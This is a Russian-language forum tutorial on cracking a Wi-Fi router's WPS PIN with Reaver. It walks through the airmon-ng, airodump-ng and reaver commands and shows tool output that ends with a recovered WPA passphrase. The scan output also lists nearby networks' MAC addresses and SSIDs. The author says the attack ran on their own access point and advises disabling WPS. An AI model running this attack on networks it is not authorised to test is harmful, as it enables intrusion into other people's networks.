Всем привет!
Наконец то дошли руки до написания статьи по reaver. Но для начала давайте немного теории.
Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания
беспроводной домашней сети, созданный
Wi-Fi Alliance. Официально запущен 8 января 2007 года.
Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.
Push Button Configuration (PBC) – кнопка при нажатии которой осуществляется авто-поиск устройств с поддержкой WPS и дальнейшее подключение к точке доступа (AP).
Итак, для начала посмотрим, какие беспроводные интерфейсы имеются.
Переводим интерфейс wlan1 в режим монитора (monitor mode).
Код:
|
sudo airmon-ng start wlan1 |
После того как wi-fi интерфейс настроен, просмотрим wi-fi сети, которые находятся в зоне действия.
Код:
|
sudo airodump-ng mon0 |
Кстати, можно так же использовать программу walsh. Она позволяет просматривать точки доступа (AP), на которых включен WPS.
Код:
|
Scanning for supported APS...
BC:AE:C5:71:D3:17 hub-lex-AP
84:C9:B2:4C:E0:57 1-OJ
00:24:01:1B:1F:B3 more
F0:7D:68:40:46:DE Okean
00:14:D1:E2:06:94 TRENDnet651
14:D6:4D:B5:07:4C DomTar |
Закон нарушать мне не хочется, поэтому буду экспериментировать на своей AP.
Код:
|
sudo reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv |
Код:
|
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from BC:AE:C5:71:D3:17
[+] Associated with BC:AE:C5:71:D3:17 (ESSID: hub-lex-AP)
[+] 0.04% complete @ 2012-01-22 03:01:06 (5 seconds/attempt)
[+] 0.05% complete @ 2012-01-22 03:01:22 (6 seconds/attempt)
...
[+] 96.76% complete @ 2012-01-22 05:00:31 (4 seconds/attempt)
[+] 96.81% complete @ 2012-01-22 05:00:46 (4 seconds/attempt)
[+] 96.83% complete @ 2012-01-22 05:01:07 (4 seconds/attempt)
[+] 96.85% complete @ 2012-01-22 05:01:30 (4 seconds/attempt)
[+] 96.89% complete @ 2012-01-22 05:01:43 (4 seconds/attempt)
[+] 96.92% complete @ 2012-01-22 05:02:00 (4 seconds/attempt)
[+] 96.96% complete @ 2012-01-22 05:02:14 (4 seconds/attempt)
[+] 97.01% complete @ 2012-01-22 05:02:29 (4 seconds/attempt)
[+] 97.03% complete @ 2012-01-22 05:02:41 (4 seconds/attempt)
[+] 97.05% complete @ 2012-01-22 05:03:15 (4 seconds/attempt)
[+] 97.09% complete @ 2012-01-22 05:03:29 (4 seconds/attempt)
[+] 97.14% complete @ 2012-01-22 05:03:44 (4 seconds/attempt)
[+] WPS PIN: '31150545'
[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
[+] AP SSID: 'hub-lex-AP' |
Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!
Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.